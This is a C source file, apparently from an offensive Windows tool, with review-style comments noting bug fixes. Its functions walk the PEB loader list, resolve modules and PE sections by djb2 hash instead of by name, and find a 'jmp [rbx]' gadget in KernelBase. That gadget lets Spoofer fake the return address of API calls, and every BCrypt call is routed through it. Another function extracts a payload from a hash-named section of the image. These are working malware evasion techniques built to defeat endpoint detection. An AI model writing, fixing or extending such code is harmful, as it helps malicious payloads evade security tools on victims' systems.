#include "kraken.h"
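/*
 * FindGadget - scan a memory range for the first occurrence of a byte pattern.
 *
 * base         start of the range to scan (here: a mapped module image)
 * size         length of the range in bytes
 * pattern      bytes to look for
 * patternSize  length of pattern in bytes
 *
 * Returns a pointer to the first match, or NULL when base/pattern is NULL,
 * the pattern is empty, longer than the range, or simply not present.
 *
 * The scan is bounded so that no compare reads past base + size. The previous
 * loop used `i < size - patternSize`: with DWORD arithmetic that underflows
 * when patternSize > size (scanning far beyond the image), and it also skipped
 * the last position where a full match still fits (off-by-one).
 */
PBYTE FindGadget(PVOID base, DWORD size, PBYTE pattern, DWORD patternSize)
{
    if (base == NULL || pattern == NULL || patternSize == 0 || patternSize > size)
    {
        return NULL;
    }

    PBYTE cursor = (PBYTE)base;
    PBYTE last = cursor + (size - patternSize); /* last offset at which patternSize bytes remain */
    for (; cursor <= last; cursor++)
    {
        if (memcmp(cursor, pattern, patternSize) == 0)
        {
            return cursor;
        }
    }
    return NULL;
}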
/*
 * HashStringDjb2W - djb2 hash of a NUL-terminated wide string.
 *
 * h = h * 33 + c over each WCHAR up to (not including) the terminator,
 * seeded with 5381. The result is compared against precomputed constants
 * elsewhere in this file, so the algorithm must not change.
 *
 * Note: this is not case-insensitive; the caller gets whatever case the
 * loader stored in BaseDllName.
 */
DWORD HashStringDjb2W(LPCWSTR String)
{
    ULONG h = 5381;
    for (LPCWSTR p = String; *p != L'\0'; p++)
    {
        h = (h << 5) + h + (INT)*p; /* h * 33 + c */
    }
    return h;
}
/*
 * HashStringDjb2A - djb2 hash of a NUL-terminated narrow string.
 *
 * h = h * 33 + c over each char up to (not including) the terminator,
 * seeded with 5381. Must stay byte-for-byte consistent with the precomputed
 * constants it is compared against (e.g. the section-name hash in
 * TakeSectionInfo), so the algorithm is fixed.
 *
 * `c` is taken as a (possibly signed) char promoted to INT, so on compilers
 * where char is signed, bytes >= 0x80 are sign-extended before being added.
 * Pure-ASCII input is unaffected.
 */
DWORD HashStringDjb2A(LPCSTR String)
{
    ULONG h = 5381;
    for (LPCSTR p = String; *p != '\0'; p++)
    {
        h = (h << 5) + h + (INT)*p; /* h * 33 + c */
    }
    return h;
}
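/*
 * SearchGadgetOnKernelBaseModule - walk the loader's InMemoryOrder module list
 * and, in the module whose BaseDllName djb2-hashes to 0x3ec3feb (KernelBase,
 * going by the function name — the constant is not recomputed here), scan the
 * mapped image for pbPattern.
 *
 * pbPattern      bytes to find
 * dwPatternSize  length of pbPattern
 *
 * Returns the gadget address, or NULL when no module matches or the pattern
 * is absent from that module.
 *
 * Fixes over the previous version:
 *  - the not-found path fell off the end of a non-void function (UB);
 *  - the walk advanced through InLoadOrderLinks (entry offset 0) while its
 *    termination test compared against an InMemoryOrderLinks node (entry
 *    offset 0x10), so the loop could only ever stop by finding a match.
 *
 * Caveats: FindGadget scans DllBase..DllBase+SizeOfImage, i.e. headers and
 * data sections as well as code; a match outside an executable section would
 * fault if used as a jump target. BaseDllName is a UNICODE_STRING and is not
 * guaranteed NUL-terminated by type, though loader entries are in practice.
 */
PVOID SearchGadgetOnKernelBaseModule(PBYTE pbPattern, DWORD dwPatternSize)
{
    PTEB pTeb = (PTEB)__readgsqword(0x30);
    PPEB pPeb = pTeb->ProcessEnvironmentBlock;
    LIST_ENTRY *pHead = &pPeb->Ldr->InMemoryOrderModuleList;

    /* One list throughout: each node is LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks,
     * 0x10 bytes into the entry (the same offset GetNtdllAddr relies on). */
    for (LIST_ENTRY *pNode = pHead->Flink; pNode != NULL && pNode != pHead; pNode = pNode->Flink)
    {
        PLDR_DATA_TABLE_ENTRY pEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pNode - 0x10);
        if (pEntry->BaseDllName.Buffer == NULL)
        {
            continue;
        }
        if (HashStringDjb2W(pEntry->BaseDllName.Buffer) == 0x3ec3feb)
        {
            return FindGadget(pEntry->DllBase, (DWORD)pEntry->SizeOfImage, pbPattern, dwPatternSize);
        }
    }
    return NULL;
}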
/*
 * GetNtdllAddr - return the DllBase of the second entry in the loader's
 * InMemoryOrder module list.
 *
 * The function name implies the conventional layout (the executable first,
 * ntdll second); nothing here verifies the module's name, so a non-standard
 * load order would yield a different module's base. No NULL checks are made
 * on PEB/Ldr pointers.
 */
PVOID GetNtdllAddr() {
    PTEB pTeb = (PTEB)__readgsqword(0x30);
    PPEB pPeb = pTeb->ProcessEnvironmentBlock;
    LIST_ENTRY *pFirstNode = pPeb->Ldr->InMemoryOrderModuleList.Flink; /* skipped */
    LIST_ENTRY *pSecondNode = pFirstNode->Flink;
    /* node is LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks, 0x10 bytes into the entry */
    PLDR_DATA_TABLE_ENTRY pEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pSecondNode - 0x10);
    return pEntry->DllBase;
}
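/*
 * Spoofer - invoke pFunction(pArg1..pArg8) via SpoofStub, handing the stub a
 * gadget address from the module located by SearchGadgetOnKernelBaseModule
 * (SpoofStub is defined elsewhere; presumably it uses the gadget as the
 * return address the callee sees instead of one inside this image).
 *
 * Returns SpoofStub's result, or NULL when no gadget could be found or
 * pFunction is NULL. Previously a NULL gadget was passed into the stub
 * unchecked, which would fault inside the stub rather than fail cleanly.
 *
 * The PRM layout { gadget, target } is dictated by SpoofStub (kraken.h) —
 * do not reorder the initializer. The gadget is re-searched on every call;
 * caching it would need shared state, so it is left as is.
 */
PVOID Spoofer(PVOID pFunction, PVOID pArg1, PVOID pArg2, PVOID pArg3, PVOID pArg4, PVOID pArg5, PVOID pArg6, PVOID pArg7, PVOID pArg8)
{
    BYTE bPattern[] = { 0xFF, 0x23 }; /* x86-64: jmp qword ptr [rbx] */
    PVOID pGadgetAddr = SearchGadgetOnKernelBaseModule(bPattern, (DWORD)sizeof(bPattern));
    if (pGadgetAddr == NULL || pFunction == NULL)
    {
        return NULL;
    }

    PRM param = { pGadgetAddr, pFunction };
    return SpoofStub(pArg1, pArg2, pArg3, pArg4, &param, pArg5, pArg6, pArg7, pArg8);
}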
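/*
 * GenerateKey - fill key[0..keySize) with bytes from the CNG RNG provider,
 * issuing each BCrypt call through the SPOOF() wrapper.
 *
 * key      output buffer
 * keySize  number of random bytes to produce
 *
 * Returns TRUE when keySize random bytes were written. Returns FALSE when
 * key is NULL, keySize is 0, the provider could not be opened, or
 * BCryptGenRandom failed; in that case the buffer contents are unspecified
 * and MUST NOT be used as key material. The previous version discarded every
 * status, so a failed open left whatever was on the stack in `key` with no
 * way for the caller to notice. VOID -> BOOL is call-compatible for existing
 * callers, but they should now check the result.
 *
 * NOTE(review): this assumes SPOOF(...) evaluates to Spoofer's PVOID return
 * with the callee's NTSTATUS in its low 32 bits, and that SPOOF pads the
 * omitted trailing dwFlags arguments with 0 as the original relied on —
 * confirm against the macro in kraken.h. NT_SUCCESS() is `status >= 0`,
 * spelled out here to avoid depending on which header defines it.
 */
BOOL GenerateKey(BYTE* key, DWORD keySize)
{
    if (key == NULL || keySize == 0)
    {
        return FALSE;
    }

    BCRYPT_ALG_HANDLE hAlgorithm = NULL;
    NTSTATUS status = (NTSTATUS)(ULONG)(ULONG_PTR)SPOOF(BCryptOpenAlgorithmProvider, &hAlgorithm, BCRYPT_RNG_ALGORITHM, NULL);
    if (status < 0 || hAlgorithm == NULL)
    {
        return FALSE;
    }

    status = (NTSTATUS)(ULONG)(ULONG_PTR)SPOOF(BCryptGenRandom, hAlgorithm, key, keySize);
    BOOL ok = (status >= 0);

    /* Close is best effort: the bytes (if any) are already in `key`. */
    SPOOF(BCryptCloseAlgorithmProvider, hAlgorithm, 0);
    return ok;
}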
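/*
 * TakeSectionInfo - find, in the current process image, the PE section whose
 * name djb2-hashes (HashStringDjb2A) to 0xb80c0d8 and report the payload
 * that follows its SECTION_HEADER_SIZE-byte prefix.
 *
 * SecInfo  on success receives
 *            pAddr  = ImageBase + VirtualAddress + SECTION_HEADER_SIZE
 *            dwSize = SizeOfRawData - SECTION_HEADER_SIZE
 *          and is left untouched on failure.
 *
 * Returns TRUE when the section is found and large enough to hold the
 * prefix, FALSE otherwise (also FALSE for SecInfo == NULL).
 *
 * Fixes over the previous version:
 *  - IMAGE_SECTION_HEADER.Name is BYTE[IMAGE_SIZEOF_SHORT_NAME] (8 bytes) and
 *    is NOT NUL-terminated when the name uses all 8; hashing it in place read
 *    past the field into the following header bytes. The name is now copied
 *    into a terminated buffer first.
 *  - SizeOfRawData < SECTION_HEADER_SIZE underflowed dwSize to a huge value.
 *  - `(DWORD_PTR)SecInfo->pAddr += n` (a cast-as-lvalue MSVC extension) is
 *    replaced by standard pointer arithmetic.
 * No PE signature checks are made: ImageBaseAddress is this process's own
 * image, already validated by the loader.
 */
BOOL TakeSectionInfo(PSECTION_INFO SecInfo)
{
    if (SecInfo == NULL)
    {
        return FALSE;
    }

    PTEB pTeb = (PTEB)__readgsqword(0x30);
    PPEB pPeb = pTeb->ProcessEnvironmentBlock;
    PBYTE pImageBase = (PBYTE)pPeb->ImageBaseAddress;
    PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)pImageBase;
    PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)(pImageBase + pDosHeader->e_lfanew);
    PIMAGE_SECTION_HEADER pSections = IMAGE_FIRST_SECTION(pNtHeaders);

    for (WORD i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++)
    {
        CHAR szName[IMAGE_SIZEOF_SHORT_NAME + 1] = { 0 }; /* guaranteed terminator */
        memcpy(szName, pSections[i].Name, IMAGE_SIZEOF_SHORT_NAME);
        if (HashStringDjb2A(szName) != 0xb80c0d8)
        {
            continue;
        }
        if (pSections[i].SizeOfRawData < SECTION_HEADER_SIZE)
        {
            return FALSE; /* too small to carry the header prefix; dwSize would underflow */
        }
        SecInfo->pAddr = (PVOID)(pImageBase + pSections[i].VirtualAddress + SECTION_HEADER_SIZE);
        SecInfo->dwSize = pSections[i].SizeOfRawData - SECTION_HEADER_SIZE;
        return TRUE;
    }
    return FALSE;
}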